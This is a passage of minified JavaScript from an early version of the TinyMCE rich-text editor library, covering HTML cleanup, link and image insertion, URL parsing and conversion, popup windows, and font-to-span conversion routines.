');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var 